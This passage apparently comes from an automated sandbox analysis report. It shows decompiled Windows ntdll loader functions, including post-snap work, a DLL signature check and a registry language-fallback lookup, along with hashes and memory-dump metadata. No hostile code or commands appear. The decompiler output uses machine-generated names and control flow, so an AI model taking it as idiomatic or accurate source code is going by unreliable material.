                        				intOrPtr _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v40;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t77;
                        				signed int _t80;
                        				signed char _t81;
                        				signed int _t87;
                        				signed int _t91;
                        				void* _t92;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t103;
                        				signed int _t105;
                        				signed int _t110;
                        				signed int _t118;
                        				intOrPtr* _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t129;
                        				signed int _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed int _t143;
                        				signed int* _t147;
                        				signed int _t151;
                        				void* _t153;
                        				signed int* _t157;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t166;
                        				signed int _t168;
                        
                        				_push(__ecx);
                        				_t153 = __ecx;
                        				_t159 = 0;
                        				_t121 = __ecx + 0x3c;
                        				if( *_t121 == 0) {
                        					L2:
                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                        							L6:
                        							if(E02BA934A() != 0) {
                        								_t159 = E02C1A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                        								__eflags = _t159;
                        								if(_t159 < 0) {
                        									_t81 =  *0x2c85780; // 0x0
                        									__eflags = _t81 & 0x00000003;
                        									if((_t81 & 0x00000003) != 0) {
                        										_push(_t159);
                        										E02C15510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                        										_t81 =  *0x2c85780; // 0x0
                        									}
                        									__eflags = _t81 & 0x00000010;
                        									if((_t81 & 0x00000010) != 0) {
                        										asm("int3");
                        									}
                        								}
                        							}
                        						} else {
                        							_t159 = E02BA849B(0, _t122, _t153, _t159, _t180);
                        							if(_t159 >= 0) {
                        								goto L6;
                        							}
                        						}
                        						_t80 = _t159;
                        						goto L8;
                        					} else {
                        						_t125 = 0x13;
                        						asm("int 0x29");
                        						_push(0);
                        						_push(_t159);
                        						_t161 = _t125;
                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                        						_t143 = 0;
                        						_v40 = _t161;
                        						_t118 = 0;
                        						_push(_t153);
                        						__eflags = _t87;
                        						if(_t87 != 0) {
                        							_t118 = _t87 + 0x5d8;
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								L46:
                        								_t118 = 0;
                        							} else {
                        								__eflags =  *(_t118 + 0x30);
                        								if( *(_t118 + 0x30) == 0) {
                        									goto L46;
                        								}
                        							}
                        						}
                        						_v32 = 0;
                        						_v28 = 0;
                        						_v16 = 0;
                        						_v20 = 0;
                        						_v12 = 0;
                        						__eflags = _t118;
                        						if(_t118 != 0) {
                        							__eflags = _t161;
                        							if(_t161 != 0) {
                        								__eflags =  *(_t118 + 8);
                        								if( *(_t118 + 8) == 0) {
                        									L22:
                        									_t143 = 1;
                        									__eflags = 1;
                        								} else {
                        									_t19 = _t118 + 0x40; // 0x40
                        									_t156 = _t19;
                        									E02BA8999(_t19,  &_v16);
                        									__eflags = _v0;
                        									if(_v0 != 0) {
                        										__eflags = _v0 - 1;
                        										if(_v0 != 1) {
                        											goto L22;
                        										} else {
                        											_t128 =  *(_t161 + 0x64);
                        											__eflags =  *(_t161 + 0x64);
                        											if( *(_t161 + 0x64) == 0) {
                        												goto L22;
                        											} else {
                        												E02BA8999(_t128,  &_v12);
                        												_t147 = _v12;
                        												_t91 = 0;
                        												__eflags = 0;
                        												_t129 =  *_t147;
                        												while(1) {
                        													__eflags =  *((intOrPtr*)(0x2c85c60 + _t91 * 8)) - _t129;
                        													if( *((intOrPtr*)(0x2c85c60 + _t91 * 8)) == _t129) {
                        														break;
                        													}
                        													_t91 = _t91 + 1;
                        													__eflags = _t91 - 5;
                        													if(_t91 < 5) {
                        														continue;
                        													} else {
                        														_t131 = 0;
                        														__eflags = 0;
                        													}
                        													L37:
                        													__eflags = _t131;
                        													if(_t131 != 0) {
                        														goto L22;
                        													} else {
                        														__eflags = _v16 - _t147;
                        														if(_v16 != _t147) {
                        															goto L22;
                        														} else {
                        															E02BB2280(_t92, 0x2c886cc);
                        															_t94 = E02C69DFB( &_v20);
                        															__eflags = _t94 - 1;
                        															if(_t94 != 1) {
                        															}
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															_t95 = E02BC61A0( &_v32);
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t71 = _t118 + 0x40; // 0x3f
                        																	_t134 = _t71;
                        																	goto L55;
                        																}
                        															}
                        															goto L30;
                        														}
                        													}
                        													goto L56;
                        												}
                        												_t92 = 0x2c85c64 + _t91 * 8;
                        												asm("lock xadd [eax], ecx");
                        												_t131 = (_t129 | 0xffffffff) - 1;
                        												goto L37;
                        											}
                        										}
                        										goto L56;
                        									} else {
                        										_t143 = E02BA8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                        										__eflags = _t143;
                        										if(_t143 != 0) {
                        											_t157 = _v12;
                        											_t103 = 0;
                        											__eflags = 0;
                        											_t136 =  &(_t157[1]);
                        											 *(_t161 + 0x64) = _t136;
                        											_t151 =  *_t157;
                        											_v20 = _t136;
                        											while(1) {
                        												__eflags =  *((intOrPtr*)(0x2c85c60 + _t103 * 8)) - _t151;
                        												if( *((intOrPtr*)(0x2c85c60 + _t103 * 8)) == _t151) {
                        													break;
                        												}
                        												_t103 = _t103 + 1;
                        												__eflags = _t103 - 5;
                        												if(_t103 < 5) {
                        													continue;
                        												}
                        												L21:
                        												_t105 = E02BDF380(_t136, 0x2b71184, 0x10);
                        												__eflags = _t105;
                        												if(_t105 != 0) {
                        													__eflags =  *_t157 -  *_v16;
                        													if( *_t157 >=  *_v16) {
                        														goto L22;
                        													} else {
                        														asm("cdq");
                        														_t166 = _t157[5] & 0x0000ffff;
                        														_t108 = _t157[5] & 0x0000ffff;
                        														asm("cdq");
                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                        														if(__eflags > 0) {
                        															L29:
                        															E02BB2280(_t108, 0x2c886cc);
                        															 *_t118 =  *_t118 + 1;
                        															_t42 = _t118 + 0x40; // 0x3f
                        															_t156 = _t42;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															_t110 = E02BC61A0( &_v32);
                        															__eflags = _t110;
                        															if(_t110 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t134 = _v20;
                        																	L55:
                        																	E02C69D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                        																}
                        															}
                        															L30:
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															E02BAFFB0(_t118, _t156, 0x2c886cc);
                        															goto L22;
                        														} else {
                        															if(__eflags < 0) {
                        																goto L22;
                        															} else {
                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                        																	goto L22;
                        																} else {
                        																	goto L29;
                        																}
                        															}
                        														}
                        													}
                        													goto L56;
                        												}
                        												goto L22;
                        											}
                        											asm("lock inc dword [eax]");
                        											goto L21;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						return _t143;
                        					}
                        				} else {
                        					_push( &_v8);
                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                        					_push(__ecx + 0x40);
                        					_push(_t121);
                        					_push(0xffffffff);
                        					_t80 = E02BD9A00();
                        					_t159 = _t80;
                        					if(_t159 < 0) {
                        						L8:
                        						return _t80;
                        					} else {
                        						goto L2;
                        					}
                        				}
                        				L56:
                        			}












































                        0x02ba8799
                        0x02ba879d
                        0x02ba87a1
                        0x02ba87a3
                        0x02ba87a8
                        0x02ba87c3
                        0x02ba87c3
                        0x02ba87c8
                        0x02ba87d1
                        0x02ba87d4
                        0x02ba87d8
                        0x02ba87e5
                        0x02ba87ec
                        0x02bf9bfe
                        0x02bf9c00
                        0x02bf9c02
                        0x02bf9c08
                        0x02bf9c0d
                        0x02bf9c0f
                        0x02bf9c14
                        0x02bf9c2d
                        0x02bf9c32
                        0x02bf9c37
                        0x02bf9c3a
                        0x02bf9c3c
                        0x02bf9c42
                        0x02bf9c42
                        0x02bf9c3c
                        0x02bf9c02
                        0x02ba87da
                        0x02ba87df
                        0x02ba87e3
                        0x00000000
                        0x00000000
                        0x02ba87e3
                        0x02ba87f2
                        0x00000000
                        0x02ba87fb
                        0x02ba87fd
                        0x02ba87fe
                        0x02ba880e
                        0x02ba880f
                        0x02ba8810
                        0x02ba8814
                        0x02ba881a
                        0x02ba881c
                        0x02ba881f
                        0x02ba8821
                        0x02ba8822
                        0x02ba8824
                        0x02ba8826
                        0x02ba882c
                        0x02ba882e
                        0x02bf9c48
                        0x02bf9c48
                        0x02ba8834
                        0x02ba8834
                        0x02ba8837
                        0x00000000
                        0x00000000
                        0x02ba8837
                        0x02ba882e
                        0x02ba883d
                        0x02ba8840
                        0x02ba8843
                        0x02ba8846
                        0x02ba8849
                        0x02ba884c
                        0x02ba884e
                        0x02ba8850
                        0x02ba8852
                        0x02ba8854
                        0x02ba8857
                        0x02ba88b4
                        0x02ba88b6
                        0x02ba88b6
                        0x02ba8859
                        0x02ba8859
                        0x02ba8859
                        0x02ba8861
                        0x02ba8866
                        0x02ba886a
                        0x02ba893d
                        0x02ba8941
                        0x00000000
                        0x02ba8947
                        0x02ba8947
                        0x02ba894a
                        0x02ba894c
                        0x00000000
                        0x02ba8952
                        0x02ba8955
                        0x02ba895a
                        0x02ba895d
                        0x02ba895d
                        0x02ba895f
                        0x02ba8961
                        0x02ba8961
                        0x02ba8968
                        0x00000000
                        0x00000000
                        0x02ba896a
                        0x02ba896b
                        0x02ba896e
                        0x00000000
                        0x02ba8970
                        0x02ba8970
                        0x02ba8970
                        0x02ba8970
                        0x02ba8972
                        0x02ba8972
                        0x02ba8974
                        0x00000000
                        0x02ba897a
                        0x02ba897a
                        0x02ba897d
                        0x00000000
                        0x02ba8983
                        0x02bf9c65
                        0x02bf9c6d
                        0x02bf9c72
                        0x02bf9c75
                        0x02bf9c75
                        0x02bf9c82
                        0x02bf9c86
                        0x02bf9c87
                        0x02bf9c88
                        0x02bf9c89
                        0x02bf9c8c
                        0x02bf9c90
                        0x02bf9c95
                        0x02bf9c97
                        0x02bf9ca0
                        0x02bf9ca3
                        0x02bf9ca9
                        0x02bf9ca9
                        0x00000000
                        0x02bf9ca9
                        0x02bf9ca3
                        0x00000000
                        0x02bf9c97
                        0x02ba897d
                        0x00000000
                        0x02ba8974
                        0x02ba8988
                        0x02ba8992
                        0x02ba8996
                        0x00000000
                        0x02ba8996
                        0x02ba894c
                        0x00000000
                        0x02ba8870
                        0x02ba887b
                        0x02ba887d
                        0x02ba887f
                        0x02ba8881
                        0x02ba8884
                        0x02ba8884
                        0x02ba8886
                        0x02ba8889
                        0x02ba888c
                        0x02ba888e
                        0x02ba8891
                        0x02ba8891
                        0x02ba8898
                        0x00000000
                        0x00000000
                        0x02ba889a
                        0x02ba889b
                        0x02ba889e
                        0x00000000
                        0x00000000
                        0x02ba88a0
                        0x02ba88a8
                        0x02ba88b0
                        0x02ba88b2
                        0x02ba88d3
                        0x02ba88d5
                        0x00000000
                        0x02ba88d7
                        0x02ba88db
                        0x02ba88dc
                        0x02ba88e0
                        0x02ba88e8
                        0x02ba88ee
                        0x02ba88f0
                        0x02ba88f3
                        0x02ba88fc
                        0x02ba8901
                        0x02ba8906
                        0x02ba890c
                        0x02ba890c
                        0x02ba890f
                        0x02ba8916
                        0x02ba8917
                        0x02ba8918
                        0x02ba8919
                        0x02ba891a
                        0x02ba891f
                        0x02ba8921
                        0x02bf9c52
                        0x02bf9c55
                        0x02bf9c5b
                        0x02bf9cac
                        0x02bf9cc0
                        0x02bf9cc0
                        0x02bf9c55
                        0x02ba8927
                        0x02ba8927
                        0x02ba892f
                        0x02ba8933
                        0x00000000
                        0x02ba88f5
                        0x02ba88f5
                        0x00000000
                        0x02ba88f7
                        0x02ba88f7
                        0x02ba88fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba88fa
                        0x02ba88f5
                        0x02ba88f3
                        0x00000000
                        0x02ba88d5
                        0x00000000
                        0x02ba88b2
                        0x02ba88c9
                        0x00000000
                        0x02ba88c9
                        0x02ba887f
                        0x02ba886a
                        0x02ba8857
                        0x02ba8852
                        0x02ba88bf
                        0x02ba88bf
                        0x02ba87aa
                        0x02ba87ad
                        0x02ba87ae
                        0x02ba87b4
                        0x02ba87b5
                        0x02ba87b6
                        0x02ba87b8
                        0x02ba87bd
                        0x02ba87c1
                        0x02ba87f4
                        0x02ba87fa
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba87c1
                        0x00000000

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 02BF9C28
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 02BF9C18
                        • LdrpDoPostSnapWork, xrefs: 02BF9C1E
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-1948996284
                        • Opcode ID: 07e99628151d17ee5ae001b16bb6cc3915c022124af16d6e3e4c233bae60ae4f
                        • Instruction ID: 6935742bbed8e4ba750f3f02dc211d8e5c8c35ed9abd4694d3b2a7ec9d52224b
                        • Opcode Fuzzy Hash: 07e99628151d17ee5ae001b16bb6cc3915c022124af16d6e3e4c233bae60ae4f
                        • Instruction Fuzzy Hash: EA911371A04615DFDF18DF58C8A0ABEB3B6FF44314B5581E9E905ABA50EB30ED05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E02BA7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				signed int _t73;
                        				void* _t77;
                        				char* _t82;
                        				char* _t87;
                        				signed char* _t97;
                        				signed char _t102;
                        				intOrPtr _t107;
                        				signed char* _t108;
                        				intOrPtr _t112;
                        				intOrPtr _t124;
                        				intOrPtr _t125;
                        				intOrPtr _t126;
                        
                        				_t107 = __edx;
                        				_v12 = __ecx;
                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                        				_t124 = 0;
                        				_v20 = __edx;
                        				if(E02BACEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                        					_t112 = _v8;
                        				} else {
                        					_t112 = 0;
                        					_v8 = 0;
                        				}
                        				if(_t112 != 0) {
                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                        						_t124 = 0xc000007b;
                        						goto L8;
                        					}
                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                        					 *(_t125 + 0x34) = _t73;
                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                        						goto L3;
                        					}
                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                        					_t124 = E02B9C9A4( *((intOrPtr*)(_t125 + 0x18)));
                        					if(_t124 < 0) {
                        						goto L8;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                        						L8:
                        						return _t124;
                        					}
                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                        							goto L5;
                        						}
                        						_t102 =  *0x2c85780; // 0x0
                        						if((_t102 & 0x00000003) != 0) {
                        							E02C15510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                        							_t102 =  *0x2c85780; // 0x0
                        						}
                        						if((_t102 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t124 = 0xc0000428;
                        						goto L8;
                        					}
                        					L5:
                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                        						goto L8;
                        					}
                        					_t77 = _a4 - 0x40000003;
                        					if(_t77 == 0 || _t77 == 0x33) {
                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                        						if(E02BB7D50() != 0) {
                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						} else {
                        							_t82 = 0x7ffe0384;
                        						}
                        						_t108 = 0x7ffe0385;
                        						if( *_t82 != 0) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02BB7D50() == 0) {
                        									_t97 = 0x7ffe0385;
                        								} else {
                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t97 & 0x00000020) != 0) {
                        									E02C17016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        						}
                        						if(_a4 != 0x40000003) {
                        							L14:
                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                        							if(E02BB7D50() != 0) {
                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							} else {
                        								_t87 = 0x7ffe0384;
                        							}
                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E02BB7D50() != 0) {
                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t108 & 0x00000020) != 0) {
                        									E02C17016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        							goto L8;
                        						} else {
                        							_v16 = _t125 + 0x24;
                        							_t124 = E02BCA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                        							if(_t124 < 0) {
                        								E02B9B1E1(_t124, 0x1490, 0, _v16);
                        								goto L8;
                        							}
                        							goto L14;
                        						}
                        					} else {
                        						goto L8;
                        					}
                        				}
                        			}




















                        0x02ba7e4c
                        0x02ba7e50
                        0x02ba7e55
                        0x02ba7e58
                        0x02ba7e5d
                        0x02ba7e71
                        0x02ba7f33
                        0x02ba7e77
                        0x02ba7e77
                        0x02ba7e79
                        0x02ba7e79
                        0x02ba7e7e
                        0x02ba7f45
                        0x02bf9848
                        0x00000000
                        0x02bf9848
                        0x02ba7f4e
                        0x02ba7f53
                        0x02ba7f5a
                        0x00000000
                        0x00000000
                        0x02bf985a
                        0x02bf9862
                        0x02bf9866
                        0x00000000
                        0x02bf986c
                        0x00000000
                        0x02bf986c
                        0x02ba7e84
                        0x02ba7e84
                        0x02ba7e8d
                        0x02bf9871
                        0x02ba7eb8
                        0x02ba7ec0
                        0x02ba7ec0
                        0x02ba7e9a
                        0x02bf987e
                        0x00000000
                        0x00000000
                        0x02bf9884
                        0x02bf988b
                        0x02bf98a7
                        0x02bf98ac
                        0x02bf98b1
                        0x02bf98b6
                        0x02bf98b8
                        0x02bf98b8
                        0x02bf98b9
                        0x00000000
                        0x02bf98b9
                        0x02ba7ea0
                        0x02ba7ea7
                        0x00000000
                        0x00000000
                        0x02ba7eac
                        0x02ba7eb1
                        0x02ba7ec6
                        0x02ba7ed0
                        0x02bf98cc
                        0x02ba7ed6
                        0x02ba7ed6
                        0x02ba7ed6
                        0x02ba7ede
                        0x02ba7ee3
                        0x02bf98e3
                        0x02bf98f0
                        0x02bf9902
                        0x02bf98f2
                        0x02bf98fb
                        0x02bf98fb
                        0x02bf9907
                        0x02bf991d
                        0x02bf991d
                        0x02bf9907
                        0x02bf98e3
                        0x02ba7ef0
                        0x02ba7f14
                        0x02ba7f14
                        0x02ba7f1e
                        0x02bf9946
                        0x02ba7f24
                        0x02ba7f24
                        0x02ba7f24
                        0x02ba7f2c
                        0x02bf996a
                        0x02bf9975
                        0x02bf9975
                        0x02bf997e
                        0x02bf9993
                        0x02bf9993
                        0x02bf997e
                        0x00000000
                        0x02ba7ef2
                        0x02ba7efc
                        0x02ba7f0a
                        0x02ba7f0e
                        0x02bf9933
                        0x00000000
                        0x02bf9933
                        0x00000000
                        0x02ba7f0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba7eb1

                        Strings
                        • minkernel\ntdll\ldrmap.c, xrefs: 02BF98A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 02BF9891
                        • LdrpCompleteMapModule, xrefs: 02BF9898
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: b53df65fcfa50f977d933cf315291de6d142301d2eb8739d3dac3d36d8ff4a43
                        • Instruction ID: 9ec2fcfd3480f404f3164cd2f40d5f384a4a17ce4bec15207a732f725473f517
                        • Opcode Fuzzy Hash: b53df65fcfa50f977d933cf315291de6d142301d2eb8739d3dac3d36d8ff4a43
                        • Instruction Fuzzy Hash: E1512431A0CB809BEB21CB68C854B6ABBE8EF41354F0445D9EA519F7E1DB70ED00DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02B9E620(void* __ecx, short* __edx, short* _a4) {
                        				char _v16;
                        				char _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				char _v32;
                        				char _v36;
                        				char _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				void* _v56;
                        				void* _v60;
                        				char _v64;
                        				void* _v68;
                        				void* _v76;
                        				void* _v84;
                        				signed int _t59;
                        				signed int _t74;
                        				signed short* _t75;
                        				signed int _t76;
                        				signed short* _t78;
                        				signed int _t83;
                        				short* _t93;
                        				signed short* _t94;
                        				short* _t96;
                        				void* _t97;
                        				signed int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t80 = __ecx;
                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                        				_t96 = __edx;
                        				_v44 = __edx;
                        				_t78 = 0;
                        				_v56 = 0;
                        				if(__ecx == 0 || __edx == 0) {
                        					L28:
                        					_t97 = 0xc000000d;
                        				} else {
                        					_t93 = _a4;
                        					if(_t93 == 0) {
                        						goto L28;
                        					}
                        					_t78 = E02B9F358(__ecx, 0xac);
                        					if(_t78 == 0) {
                        						_t97 = 0xc0000017;
                        						L6:
                        						if(_v56 != 0) {
                        							_push(_v56);
                        							E02BD95D0();
                        						}
                        						if(_t78 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                        						}
                        						return _t97;
                        					}
                        					E02BDFA60(_t78, 0, 0x158);
                        					_v48 = _v48 & 0x00000000;
                        					_t102 = _t101 + 0xc;
                        					 *_t96 = 0;
                        					 *_t93 = 0;
                        					E02BDBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                        					_v36 = 0x18;
                        					_v28 =  &_v44;
                        					_v64 = 0;
                        					_push( &_v36);
                        					_push(0x20019);
                        					_v32 = 0;
                        					_push( &_v64);
                        					_v24 = 0x40;
                        					_v20 = 0;
                        					_v16 = 0;
                        					_t97 = E02BD9600();
                        					if(_t97 < 0) {
                        						goto L6;
                        					}
                        					E02BDBB40(0,  &_v36, L"InstallLanguageFallback");
                        					_push(0);
                        					_v48 = 4;
                        					_t97 = L02B9F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                        					if(_t97 >= 0) {
                        						if(_v52 != 1) {
                        							L17:
                        							_t97 = 0xc0000001;
                        							goto L6;
                        						}
                        						_t59 =  *_t78 & 0x0000ffff;
                        						_t94 = _t78;
                        						_t83 = _t59;
                        						if(_t59 == 0) {
                        							L19:
                        							if(_t83 == 0) {
                        								L23:
                        								E02BDBB40(_t83, _t102 + 0x24, _t78);
                        								if(L02BA43C0( &_v48,  &_v64) == 0) {
                        									goto L17;
                        								}
                        								_t84 = _v48;
                        								 *_v48 = _v56;
                        								if( *_t94 != 0) {
                        									E02BDBB40(_t84, _t102 + 0x24, _t94);
                        									if(L02BA43C0( &_v48,  &_v64) != 0) {
                        										 *_a4 = _v56;
                        									} else {
                        										_t97 = 0xc0000001;
                        										 *_v48 = 0;
                        									}
                        								}
                        								goto L6;
                        							}
                        							_t83 = _t83 & 0x0000ffff;
                        							while(_t83 == 0x20) {
                        								_t94 =  &(_t94[1]);
                        								_t74 =  *_t94 & 0x0000ffff;
                        								_t83 = _t74;
                        								if(_t74 != 0) {
                        									continue;
                        								}
                        								goto L23;
                        							}
                        							goto L23;
                        						} else {
                        							goto L14;
                        						}
                        						while(1) {
                        							L14:
                        							_t27 =  &(_t94[1]); // 0x2
                        							_t75 = _t27;
                        							if(_t83 == 0x2c) {
                        								break;
                        							}
                        							_t94 = _t75;
                        							_t76 =  *_t94 & 0x0000ffff;
                        							_t83 = _t76;
                        							if(_t76 != 0) {
                        								continue;
                        							}
                        							goto L23;
                        						}
                        						 *_t94 = 0;
                        						_t94 = _t75;
                        						_t83 =  *_t75 & 0x0000ffff;
                        						goto L19;
                        					}
                        				}
                        			}































                        0x02b9e620
                        0x02b9e628
                        0x02b9e62f
                        0x02b9e631
                        0x02b9e635
                        0x02b9e637
                        0x02b9e63e
                        0x02bf5503
                        0x02bf5503
                        0x02b9e64c
                        0x02b9e64c
                        0x02b9e651
                        0x00000000
                        0x00000000
                        0x02b9e661
                        0x02b9e665
                        0x02bf542a
                        0x02b9e715
                        0x02b9e71a
                        0x02b9e71c
                        0x02b9e720
                        0x02b9e720
                        0x02b9e727
                        0x02b9e736
                        0x02b9e736
                        0x02b9e743
                        0x02b9e743
                        0x02b9e673
                        0x02b9e678
                        0x02b9e67d
                        0x02b9e682
                        0x02b9e685
                        0x02b9e692
                        0x02b9e69b
                        0x02b9e6a3
                        0x02b9e6ad
                        0x02b9e6b1
                        0x02b9e6b2
                        0x02b9e6bb
                        0x02b9e6bf
                        0x02b9e6c0
                        0x02b9e6c8
                        0x02b9e6cc
                        0x02b9e6d5
                        0x02b9e6d9
                        0x00000000
                        0x00000000
                        0x02b9e6e5
                        0x02b9e6ea
                        0x02b9e6f9
                        0x02b9e70b
                        0x02b9e70f
                        0x02bf5439
                        0x02bf545e
                        0x02bf545e
                        0x00000000
                        0x02bf545e
                        0x02bf543b
                        0x02bf543e
                        0x02bf5440
                        0x02bf5445
                        0x02bf5472
                        0x02bf5475
                        0x02bf548d
                        0x02bf5493
                        0x02bf54a9
                        0x00000000
                        0x00000000
                        0x02bf54ab
                        0x02bf54b4
                        0x02bf54bc
                        0x02bf54c8
                        0x02bf54de
                        0x02bf54fb
                        0x02bf54e0
                        0x02bf54e6
                        0x02bf54eb
                        0x02bf54eb
                        0x02bf54de
                        0x00000000
                        0x02bf54bc
                        0x02bf5477
                        0x02bf547a
                        0x02bf5480
                        0x02bf5483
                        0x02bf5486
                        0x02bf548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf5447
                        0x02bf5447
                        0x02bf5447
                        0x02bf5447
                        0x02bf544e
                        0x00000000
                        0x00000000
                        0x02bf5450
                        0x02bf5452
                        0x02bf5455
                        0x02bf545a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bf545c
                        0x02bf546a
                        0x02bf546d
                        0x02bf546f
                        0x00000000
                        0x02bf546f
                        0x02b9e70f

                        Strings
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 02B9E68C
                        • InstallLanguageFallback, xrefs: 02B9E6DB
                        • @, xrefs: 02B9E6C0
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
